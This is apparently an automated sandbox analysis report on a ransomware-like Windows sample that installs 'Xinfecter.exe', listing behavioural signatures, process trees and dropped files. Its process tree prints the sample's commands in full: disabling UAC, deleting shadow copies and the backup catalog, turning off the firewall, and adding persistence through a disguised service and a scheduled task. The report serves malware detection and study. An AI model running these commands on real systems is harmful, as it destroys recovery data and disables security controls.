Analysis
-
max time kernel
178s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
10-02-2023 08:40
Static task
static1
Behavioral task
behavioral1
Sample
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
Resource
win10v2004-20221111-en
General
-
Target
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
-
Size
1.2MB
-
MD5
e07ee232400dafd802235b90e0e7e056
-
SHA1
49ab07c411e63e8ad305b58489c69fded1f2db13
-
SHA256
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08
-
SHA512
6607ba5bf390666bf7d3487984c3241783a5137fa2f3af3bc8173a7a1520d1fe5456512cb6eecd613b5ccb30d5f0a41df9987886d1818269068f6fd27958ac41
-
SSDEEP
24576:Kwh7cD9+IBdH0oIX68Ta7fGXbt8RRnUtX642Rg0ybdDHSF1dRiDHBT2c+T:H7cDUIBdH0Pe7FnUtXh0wSVRi7BT2c+T
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Creates new service(s) 1 TTPs
-
Modifies Windows Firewall 1 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 4208 netsh.exe 4404 netsh.exe 4500 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exedescription ioc process File opened (read-only) \??\W: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\G: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\K: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\O: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\P: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\R: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\V: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\B: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\Z: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\Y: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\A: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\J: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\S: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\T: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\U: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\X: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\N: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\Q: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\E: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\F: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\H: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\I: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\L: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened (read-only) \??\M: 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 28 api.ipify.org -
Drops file in Windows directory 2 IoCs
Processes:
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exedescription ioc process File created C:\Windows\SysMain.sys 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe File opened for modification C:\Windows\SysMain.sys 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid process 400 sc.exe 4456 sc.exe 816 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 8 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 3180 timeout.exe 3736 timeout.exe 1340 timeout.exe 4516 timeout.exe 4708 timeout.exe 3472 timeout.exe 208 timeout.exe 4188 timeout.exe -
Enumerates processes with tasklist 1 TTPs 9 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 1004 tasklist.exe 2880 tasklist.exe 2456 tasklist.exe 3404 tasklist.exe 2068 tasklist.exe 1656 tasklist.exe 2936 tasklist.exe 2216 tasklist.exe 3576 tasklist.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 1552 systeminfo.exe 2824 systeminfo.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
tasklist.exetasklist.exepid process 1004 tasklist.exe 1004 tasklist.exe 2880 tasklist.exe 2880 tasklist.exe -
Suspicious use of AdjustPrivilegeToken 54 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exeWMIC.exevssvc.exetasklist.exetasklist.exetasklist.exetasklist.exedescription pid process Token: SeDebugPrivilege 1004 tasklist.exe Token: SeDebugPrivilege 2880 tasklist.exe Token: SeDebugPrivilege 2456 tasklist.exe Token: SeDebugPrivilege 1656 tasklist.exe Token: SeDebugPrivilege 3404 tasklist.exe Token: SeIncreaseQuotaPrivilege 780 WMIC.exe Token: SeSecurityPrivilege 780 WMIC.exe Token: SeTakeOwnershipPrivilege 780 WMIC.exe Token: SeLoadDriverPrivilege 780 WMIC.exe Token: SeSystemProfilePrivilege 780 WMIC.exe Token: SeSystemtimePrivilege 780 WMIC.exe Token: SeProfSingleProcessPrivilege 780 WMIC.exe Token: SeIncBasePriorityPrivilege 780 WMIC.exe Token: SeCreatePagefilePrivilege 780 WMIC.exe Token: SeBackupPrivilege 780 WMIC.exe Token: SeRestorePrivilege 780 WMIC.exe Token: SeShutdownPrivilege 780 WMIC.exe Token: SeDebugPrivilege 780 WMIC.exe Token: SeSystemEnvironmentPrivilege 780 WMIC.exe Token: SeRemoteShutdownPrivilege 780 WMIC.exe Token: SeUndockPrivilege 780 WMIC.exe Token: SeManageVolumePrivilege 780 WMIC.exe Token: 33 780 WMIC.exe Token: 34 780 WMIC.exe Token: 35 780 WMIC.exe Token: 36 780 WMIC.exe Token: SeIncreaseQuotaPrivilege 780 WMIC.exe Token: SeSecurityPrivilege 780 WMIC.exe Token: SeTakeOwnershipPrivilege 780 WMIC.exe Token: SeLoadDriverPrivilege 780 WMIC.exe Token: SeSystemProfilePrivilege 780 WMIC.exe Token: SeSystemtimePrivilege 780 WMIC.exe Token: SeProfSingleProcessPrivilege 780 WMIC.exe Token: SeIncBasePriorityPrivilege 780 WMIC.exe Token: SeCreatePagefilePrivilege 780 WMIC.exe Token: SeBackupPrivilege 780 WMIC.exe Token: SeRestorePrivilege 780 WMIC.exe Token: SeShutdownPrivilege 780 WMIC.exe Token: SeDebugPrivilege 780 WMIC.exe Token: SeSystemEnvironmentPrivilege 780 WMIC.exe Token: SeRemoteShutdownPrivilege 780 WMIC.exe Token: SeUndockPrivilege 780 WMIC.exe Token: SeManageVolumePrivilege 780 WMIC.exe Token: 33 780 WMIC.exe Token: 34 780 WMIC.exe Token: 35 780 WMIC.exe Token: 36 780 WMIC.exe Token: SeBackupPrivilege 4036 vssvc.exe Token: SeRestorePrivilege 4036 vssvc.exe Token: SeAuditPrivilege 4036 vssvc.exe Token: SeDebugPrivilege 2068 tasklist.exe Token: SeDebugPrivilege 2936 tasklist.exe Token: SeDebugPrivilege 2216 tasklist.exe Token: SeDebugPrivilege 3576 tasklist.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.execmd.execmd.execmd.execmd.execmd.execmd.exeWScript.execmd.execmd.exedescription pid process target process PID 3744 wrote to memory of 1396 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 1396 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 1396 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 1396 wrote to memory of 1004 1396 cmd.exe tasklist.exe PID 1396 wrote to memory of 1004 1396 cmd.exe tasklist.exe PID 1396 wrote to memory of 1004 1396 cmd.exe tasklist.exe PID 1396 wrote to memory of 648 1396 cmd.exe findstr.exe PID 1396 wrote to memory of 648 1396 cmd.exe findstr.exe PID 1396 wrote to memory of 648 1396 cmd.exe findstr.exe PID 3744 wrote to memory of 212 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 212 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 212 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 212 wrote to memory of 816 212 cmd.exe sc.exe PID 212 wrote to memory of 816 212 cmd.exe sc.exe PID 212 wrote to memory of 816 212 cmd.exe sc.exe PID 3744 wrote to memory of 3648 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 3648 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 3648 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3648 wrote to memory of 400 3648 cmd.exe sc.exe PID 3648 wrote to memory of 400 3648 cmd.exe sc.exe PID 3648 wrote to memory of 400 3648 cmd.exe sc.exe PID 3744 wrote to memory of 1892 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 1892 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 1892 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 1892 wrote to memory of 4456 1892 cmd.exe sc.exe PID 1892 wrote to memory of 4456 1892 cmd.exe sc.exe PID 1892 wrote to memory of 4456 1892 cmd.exe sc.exe PID 3744 wrote to memory of 4204 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 4204 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 4204 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 4248 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 4248 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 4248 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 4248 wrote to memory of 3236 4248 cmd.exe WScript.exe PID 4248 wrote to memory of 3236 4248 cmd.exe WScript.exe PID 4248 wrote to memory of 3236 4248 cmd.exe WScript.exe PID 3744 wrote to memory of 1372 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 1372 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 1372 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 1372 wrote to memory of 4392 1372 cmd.exe schtasks.exe PID 1372 wrote to memory of 4392 1372 cmd.exe schtasks.exe PID 1372 wrote to memory of 4392 1372 cmd.exe schtasks.exe PID 3236 wrote to memory of 3572 3236 WScript.exe cmd.exe PID 3236 wrote to memory of 3572 3236 WScript.exe cmd.exe PID 3236 wrote to memory of 3572 3236 WScript.exe cmd.exe PID 3236 wrote to memory of 4368 3236 WScript.exe cmd.exe PID 3236 wrote to memory of 4368 3236 WScript.exe cmd.exe PID 3236 wrote to memory of 4368 3236 WScript.exe cmd.exe PID 4368 wrote to memory of 2880 4368 cmd.exe tasklist.exe PID 4368 wrote to memory of 2880 4368 cmd.exe tasklist.exe PID 4368 wrote to memory of 2880 4368 cmd.exe tasklist.exe PID 4368 wrote to memory of 3448 4368 cmd.exe find.exe PID 4368 wrote to memory of 3448 4368 cmd.exe find.exe PID 4368 wrote to memory of 3448 4368 cmd.exe find.exe PID 3744 wrote to memory of 4784 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 4784 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 4784 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 3784 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 3784 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3744 wrote to memory of 3784 3744 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe cmd.exe PID 3784 wrote to memory of 1552 3784 cmd.exe systeminfo.exe PID 3784 wrote to memory of 1552 3784 cmd.exe systeminfo.exe PID 3784 wrote to memory of 1552 3784 cmd.exe systeminfo.exe PID 3784 wrote to memory of 1300 3784 cmd.exe find.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\S-8459.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\S-6748.bat4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\S-6748.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\S-2153.bat'" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\S-2153.batFilesize
138B
MD582a528cbf39b8ea7e2982e7b2305204c
SHA1717836e0e2b304ed7ae239cc1db0f6f80e0419b1
SHA256616738526c38e04f992b7b9fc60cb7feb3ee416bf47b69aa2c3a5f1a722a653b
SHA512eff7654e171dbd9bc471718a7e14ee3c84a9edf948f4c8863c8107e653be8ba06bc7a2876d506d6e4ae7ef2280e820d04615ebcd88894ef01b3667d070241db3
-
C:\Users\Admin\AppData\S-6748.batFilesize
2KB
MD53dba4c2dba3286a09d0b8ee61569f602
SHA14fb2a73854fad23f26d08c76fdda4e2268ea5f9e
SHA25689d549b2862e20141b0b25ed7165a00e27ed865c6fb78be56393b8395465f5c7
SHA512054c3c7ff25534a4b24f03ec62aa38c0f8352948d350f008f1b7beb3c72ea3c495fcb8c3194d9bfc3fffc363c2bca5c05d520942c063d450127c188afc2ba0d0
-
C:\Users\Admin\AppData\S-8459.vbsFilesize
686B
MD5ed7a274ff8ac640416952bfb5d6c927a
SHA16b33cd5b39db6e9a900336e446f64a137f0a0f42
SHA2564d68e4a7a437eb4a7ad9c7b28bdda894a68ae41efba8a5e4d3a6a930bebfeea5
SHA5128f3a4f071550afe716c5d39601cf1e8559084fbb701e95b28eb7685fed6d8a972e662ad19124a2242fd30c291b8dd1f18f1a2dcf56ac6c98f2bf96bac91510f3
-
memory/208-188-0x0000000000000000-mapping.dmp
-
memory/212-135-0x0000000000000000-mapping.dmp
-
memory/396-158-0x0000000000000000-mapping.dmp
-
memory/400-138-0x0000000000000000-mapping.dmp
-
memory/648-134-0x0000000000000000-mapping.dmp
-
memory/780-173-0x0000000000000000-mapping.dmp
-
memory/816-136-0x0000000000000000-mapping.dmp
-
memory/1004-133-0x0000000000000000-mapping.dmp
-
memory/1092-187-0x0000000000000000-mapping.dmp
-
memory/1224-184-0x0000000000000000-mapping.dmp
-
memory/1300-156-0x0000000000000000-mapping.dmp
-
memory/1340-170-0x0000000000000000-mapping.dmp
-
memory/1372-146-0x0000000000000000-mapping.dmp
-
memory/1396-132-0x0000000000000000-mapping.dmp
-
memory/1552-155-0x0000000000000000-mapping.dmp
-
memory/1656-165-0x0000000000000000-mapping.dmp
-
memory/1856-181-0x0000000000000000-mapping.dmp
-
memory/1892-139-0x0000000000000000-mapping.dmp
-
memory/2024-163-0x0000000000000000-mapping.dmp
-
memory/2068-175-0x0000000000000000-mapping.dmp
-
memory/2216-183-0x0000000000000000-mapping.dmp
-
memory/2456-162-0x0000000000000000-mapping.dmp
-
memory/2824-159-0x0000000000000000-mapping.dmp
-
memory/2880-151-0x0000000000000000-mapping.dmp
-
memory/2936-180-0x0000000000000000-mapping.dmp
-
memory/3024-176-0x0000000000000000-mapping.dmp
-
memory/3096-169-0x0000000000000000-mapping.dmp
-
memory/3180-164-0x0000000000000000-mapping.dmp
-
memory/3236-145-0x0000000000000000-mapping.dmp
-
memory/3404-168-0x0000000000000000-mapping.dmp
-
memory/3448-152-0x0000000000000000-mapping.dmp
-
memory/3464-161-0x0000000000000000-mapping.dmp
-
memory/3468-172-0x0000000000000000-mapping.dmp
-
memory/3472-185-0x0000000000000000-mapping.dmp
-
memory/3572-148-0x0000000000000000-mapping.dmp
-
memory/3576-186-0x0000000000000000-mapping.dmp
-
memory/3648-137-0x0000000000000000-mapping.dmp
-
memory/3736-167-0x0000000000000000-mapping.dmp
-
memory/3784-154-0x0000000000000000-mapping.dmp
-
memory/3848-171-0x0000000000000000-mapping.dmp
-
memory/4048-160-0x0000000000000000-mapping.dmp
-
memory/4076-166-0x0000000000000000-mapping.dmp
-
memory/4188-157-0x0000000000000000-mapping.dmp
-
memory/4204-141-0x0000000000000000-mapping.dmp
-
memory/4208-174-0x0000000000000000-mapping.dmp
-
memory/4248-142-0x0000000000000000-mapping.dmp
-
